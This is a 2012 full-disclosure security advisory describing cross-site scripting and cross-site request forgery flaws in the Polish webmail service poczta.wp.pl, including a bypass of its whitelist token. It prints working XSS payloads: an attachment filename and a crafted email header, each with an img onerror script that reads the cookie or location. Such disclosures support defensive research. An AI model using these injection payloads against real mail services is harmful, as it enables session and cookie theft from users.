Poczta.WP Multiple vulnerabilities full disclosure security paper Author: Jakub Zoczek [zoczus(x)gmail.com] 0x01 Intro ---------- Wirtualna Polska S.A. (WP) is one of the largest Polish web portals. Their email service (poczta.wp.pl) is affected by multiple cross-site scripting vulnerabilities and also one, almost fixed cross-site request forgery bug. After long time of waiting - I got a non-professional answer from Customer Service Manager of WP, so I decided to post all my research here. Thus... 0x02 XSS in mail attachments. ---------- Reported: 10/10/2012 State: Fixed Proof Of Concept: For example - jpeg picture with filename: sowa oraz "> inject <img src="boom.jpg" onerror="alert(document.cookie);"> hhh.jpg ..sent as e-mail attachment. Result: http://q-x.ath.cx/~zoczus/poc/wp/wpxss1.png 0x03 XSRF in AntyHack and AntySpam fitler (adding to white list) ---------- Reported: 24/11/2012 State: "Fixed" Proof Of Concept: http://q-x.ath.cx/~zoczus/poc/wp/wp-xsrf.txt Result: http://q-x.ath.cx/~zoczus/poc/wp/xsrf-wp1.jpg http://q-x.ath.cx/~zoczus/poc/wp/xsrf-wp2.jpg 0x04 XSRF in AntyHack and AntySpam fitler - bypassing 'fix' ;) ---------- Reported: 04/12/2012 State: Not fixed Proof Of Concept: Additional info for 0x03 - as I supposed, WP used the token in a white list form (every once in a while generated md5 of something). The problem is, that the token value is probably the same for each user. For different mail accounts, different browsers, different IP addresses - token is the same... Bypassing this protection seems to be quite simple. http://q-x.ath.cx/~zoczus/poc/wp/xsrf-bypass1.png http://q-x.ath.cx/~zoczus/poc/wp/xsrf-bypass2.png 0x05 XSS in mail headers ---------- Reported: 04/12/2012 State: Not fixed Proof Of Concept: Return-Path: <zoczus@fbi.pl> Delivered-To: zoczus@wp.pl (zoczus) Received: (wp-smtpd mx.wp.pl 10088 invoked from network); 30 Nov 2012 16:04:58 +0100 Received: from emkei.cz ([46.167.245.118]) (envelope-sender <zoczus@fbi.pl>) by mx.wp.pl (WP-SMTPD) with SMTP for <zoczus@wp.pl>; 30 Nov 2012 16:04:58 +0100 Received: by emkei.cz (Postfix, from userid 33) id D4119D5807; Fri, 30 Nov 2012 16:04:57 +0100 (CET) To: zoczus@wp.pl Subject: From: "zoczus@fbi.pl" <zoczus@fbi.pl> Head<img/src="a"/onerror="alert(document.location)">er: dont have spaces X-Priority: 3 (Normal) Importance: Normal Errors-To: zoczus@fbi.pl Reply-To: zoczus@fbi.pl Content-Type: text/plain; charset=utf-8 Message-Id: <20121130150457.D4119D5807@emkei.cz> Date: Fri, 30 Nov 2012 16:04:57 +0100 (CET) X-WP-DKIM-Status: no signature (id: n/a) X-WP-AV: skaner antywirusowy poczty Wirtualnej Polski S. A. X-WP-SPAM: NO (UW) 0000010 [8Wph] Dobre! Result: http://q-x.ath.cx/~zoczus/poc/wp/wp-xss2.png 0x06 The end. :) ---- Best regards, Jakub Zoczek